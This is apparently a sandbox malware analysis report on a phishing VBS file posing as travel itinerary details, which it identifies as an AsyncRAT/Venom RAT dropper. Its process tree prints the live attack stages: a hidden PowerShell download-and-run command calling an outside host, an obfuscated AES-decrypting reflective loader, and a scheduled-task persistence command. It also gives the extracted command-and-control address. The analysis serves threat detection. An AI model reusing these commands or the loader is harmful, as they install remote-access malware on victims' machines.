Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
126s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12/12/2024, 14:25
Static task
static1
Behavioral task
behavioral1
Sample
Round Trip Itinerary details.vbs
Resource
win7-20240903-en
General
-
Target
Round Trip Itinerary details.vbs
-
Size
78KB
-
MD5
ab631b79a8f6cc0f48e17765c33c8fee
-
SHA1
539298c574b25b70379fccd8c47c3dbee5184877
-
SHA256
f24da1d458f078adf96dca79955313eea5cfe7a6a36334b1352553a31928cec6
-
SHA512
0e5818d2c4eca342c7b8ece7c8f14028e34d00e2c83f0d3c72ceaeb0380fc568ceb02df8e5743b9a691d85cc462863bceb68ccb1cf499994fe0e523debe6e550
-
SSDEEP
1536:rtYq5Mv5eaBf+kvAQKCidRC0Xe6Tw/LP5KU52t+gN4:lmRea3vAWGOyZsu4
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
45.149.241.239:1978
ewdlylafhlapsawrztd
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/4780-64-0x000001FFF1CC0000-0x000001FFF1CD8000-memory.dmp family_asyncrat -
Blocklisted process makes network request 4 IoCs
flow pid Process 33 4780 powershell.exe 40 4780 powershell.exe 44 4780 powershell.exe 45 4780 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 116 powershell.exe 2256 powershell.exe 3872 powershell.exe 4780 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 116 powershell.exe 116 powershell.exe 2256 powershell.exe 2256 powershell.exe 3872 powershell.exe 3872 powershell.exe 4780 powershell.exe 4780 powershell.exe 4780 powershell.exe 4780 powershell.exe 4780 powershell.exe 4780 powershell.exe 4780 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 116 powershell.exe Token: SeDebugPrivilege 2256 powershell.exe Token: SeDebugPrivilege 3872 powershell.exe Token: SeIncreaseQuotaPrivilege 3872 powershell.exe Token: SeSecurityPrivilege 3872 powershell.exe Token: SeTakeOwnershipPrivilege 3872 powershell.exe Token: SeLoadDriverPrivilege 3872 powershell.exe Token: SeSystemProfilePrivilege 3872 powershell.exe Token: SeSystemtimePrivilege 3872 powershell.exe Token: SeProfSingleProcessPrivilege 3872 powershell.exe Token: SeIncBasePriorityPrivilege 3872 powershell.exe Token: SeCreatePagefilePrivilege 3872 powershell.exe Token: SeBackupPrivilege 3872 powershell.exe Token: SeRestorePrivilege 3872 powershell.exe Token: SeShutdownPrivilege 3872 powershell.exe Token: SeDebugPrivilege 3872 powershell.exe Token: SeSystemEnvironmentPrivilege 3872 powershell.exe Token: SeRemoteShutdownPrivilege 3872 powershell.exe Token: SeUndockPrivilege 3872 powershell.exe Token: SeManageVolumePrivilege 3872 powershell.exe Token: 33 3872 powershell.exe Token: 34 3872 powershell.exe Token: 35 3872 powershell.exe Token: 36 3872 powershell.exe Token: SeIncreaseQuotaPrivilege 3872 powershell.exe Token: SeSecurityPrivilege 3872 powershell.exe Token: SeTakeOwnershipPrivilege 3872 powershell.exe Token: SeLoadDriverPrivilege 3872 powershell.exe Token: SeSystemProfilePrivilege 3872 powershell.exe Token: SeSystemtimePrivilege 3872 powershell.exe Token: SeProfSingleProcessPrivilege 3872 powershell.exe Token: SeIncBasePriorityPrivilege 3872 powershell.exe Token: SeCreatePagefilePrivilege 3872 powershell.exe Token: SeBackupPrivilege 3872 powershell.exe Token: SeRestorePrivilege 3872 powershell.exe Token: SeShutdownPrivilege 3872 powershell.exe Token: SeDebugPrivilege 3872 powershell.exe Token: SeSystemEnvironmentPrivilege 3872 powershell.exe Token: SeRemoteShutdownPrivilege 3872 powershell.exe Token: SeUndockPrivilege 3872 powershell.exe Token: SeManageVolumePrivilege 3872 powershell.exe Token: 33 3872 powershell.exe Token: 34 3872 powershell.exe Token: 35 3872 powershell.exe Token: 36 3872 powershell.exe Token: SeIncreaseQuotaPrivilege 3872 powershell.exe Token: SeSecurityPrivilege 3872 powershell.exe Token: SeTakeOwnershipPrivilege 3872 powershell.exe Token: SeLoadDriverPrivilege 3872 powershell.exe Token: SeSystemProfilePrivilege 3872 powershell.exe Token: SeSystemtimePrivilege 3872 powershell.exe Token: SeProfSingleProcessPrivilege 3872 powershell.exe Token: SeIncBasePriorityPrivilege 3872 powershell.exe Token: SeCreatePagefilePrivilege 3872 powershell.exe Token: SeBackupPrivilege 3872 powershell.exe Token: SeRestorePrivilege 3872 powershell.exe Token: SeShutdownPrivilege 3872 powershell.exe Token: SeDebugPrivilege 3872 powershell.exe Token: SeSystemEnvironmentPrivilege 3872 powershell.exe Token: SeRemoteShutdownPrivilege 3872 powershell.exe Token: SeUndockPrivilege 3872 powershell.exe Token: SeManageVolumePrivilege 3872 powershell.exe Token: 33 3872 powershell.exe Token: 34 3872 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4780 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 3124 wrote to memory of 116 3124 WScript.exe 84 PID 3124 wrote to memory of 116 3124 WScript.exe 84 PID 3124 wrote to memory of 4524 3124 WScript.exe 95 PID 3124 wrote to memory of 4524 3124 WScript.exe 95 PID 4524 wrote to memory of 1480 4524 cmd.exe 97 PID 4524 wrote to memory of 1480 4524 cmd.exe 97 PID 4524 wrote to memory of 2256 4524 cmd.exe 98 PID 4524 wrote to memory of 2256 4524 cmd.exe 98 PID 2256 wrote to memory of 3872 2256 powershell.exe 99 PID 2256 wrote to memory of 3872 2256 powershell.exe 99 PID 2256 wrote to memory of 2432 2256 powershell.exe 101 PID 2256 wrote to memory of 2432 2256 powershell.exe 101 PID 2432 wrote to memory of 4052 2432 WScript.exe 102 PID 2432 wrote to memory of 4052 2432 WScript.exe 102 PID 4052 wrote to memory of 1216 4052 cmd.exe 104 PID 4052 wrote to memory of 1216 4052 cmd.exe 104 PID 4052 wrote to memory of 4780 4052 cmd.exe 105 PID 4052 wrote to memory of 4780 4052 cmd.exe 105
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Round Trip Itinerary details.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:116
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4524 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xZeq9DIcMp8T9I70bsZRE1uAqlMKnnwxo9STrCb0BJQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wSiqGPKdEt2A2oq502N0Dw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WbLZH=New-Object System.IO.MemoryStream(,$param_var); $YROuh=New-Object System.IO.MemoryStream; $FnRtc=New-Object System.IO.Compression.GZipStream($WbLZH, [IO.Compression.CompressionMode]::Decompress); $FnRtc.CopyTo($YROuh); $FnRtc.Dispose(); $WbLZH.Dispose(); $YROuh.Dispose(); $YROuh.ToArray();}function execute_function($param_var,$param2_var){ $JFUbC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vIQTp=$JFUbC.EntryPoint; $vIQTp.Invoke($null, $param2_var);}$LMlhd = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $LMlhd;$qwcXI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($LMlhd).Split([Environment]::NewLine);foreach ($RYDhX in $qwcXI) { if ($RYDhX.StartsWith('qSryZxtgHRJoDBkXgCTa')) { $MiSte=$RYDhX.Substring(20); break; }}$payloads_var=[string[]]$MiSte.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:1480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_165_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_165.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3872
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_165.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_165.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4052 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xZeq9DIcMp8T9I70bsZRE1uAqlMKnnwxo9STrCb0BJQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wSiqGPKdEt2A2oq502N0Dw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WbLZH=New-Object System.IO.MemoryStream(,$param_var); $YROuh=New-Object System.IO.MemoryStream; $FnRtc=New-Object System.IO.Compression.GZipStream($WbLZH, [IO.Compression.CompressionMode]::Decompress); $FnRtc.CopyTo($YROuh); $FnRtc.Dispose(); $WbLZH.Dispose(); $YROuh.Dispose(); $YROuh.ToArray();}function execute_function($param_var,$param2_var){ $JFUbC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vIQTp=$JFUbC.EntryPoint; $vIQTp.Invoke($null, $param2_var);}$LMlhd = 'C:\Users\Admin\AppData\Roaming\Windows_Log_165.bat';$host.UI.RawUI.WindowTitle = $LMlhd;$qwcXI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($LMlhd).Split([Environment]::NewLine);foreach ($RYDhX in $qwcXI) { if ($RYDhX.StartsWith('qSryZxtgHRJoDBkXgCTa')) { $MiSte=$RYDhX.Substring(20); break; }}$payloads_var=[string[]]$MiSte.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:1216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4780
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
Filesize
1KB
MD5aa8efa56e1e40374bbd21e0e469dceb7
SHA133a592799d4898c6efdd29e132f2f76ec51dbc08
SHA25625eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf
SHA512ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
69KB
MD59a7ec81cc371860d03b51764e8eade97
SHA13a22f9120587dc2fc84765efde70586fd0775fdf
SHA25620a77dbb7b4438cc9cfa45e1a3de33b7100b039ca7f8838a12d09273f55dbe3e
SHA5129d3a4c525b0f811ab9fb57787c16ce32dcba714fea558c5f3364703a20f232ece58a83c0edf3294a62d92ce52b3878f50f1c30ef6687d1e37e855f0f069331bb
-
Filesize
115B
MD56b2203916f3eed5356bc4e70ddc3dc10
SHA1cf7f4c3e5dac7ecbb14d5cdc0b4b8f7f4131cd86
SHA256382d6d7ce066622687cef0cff35de6ffbb8b9090fc4de2fe208f9b7bc1a05223
SHA5121757c68e4366a3ed681c28ac4b891c3616f3b225805a9dcdb9700d22819a69573d09f9c47800f7efc37acfa4aec76853c957a86f2f4d3a0346aa48419829e164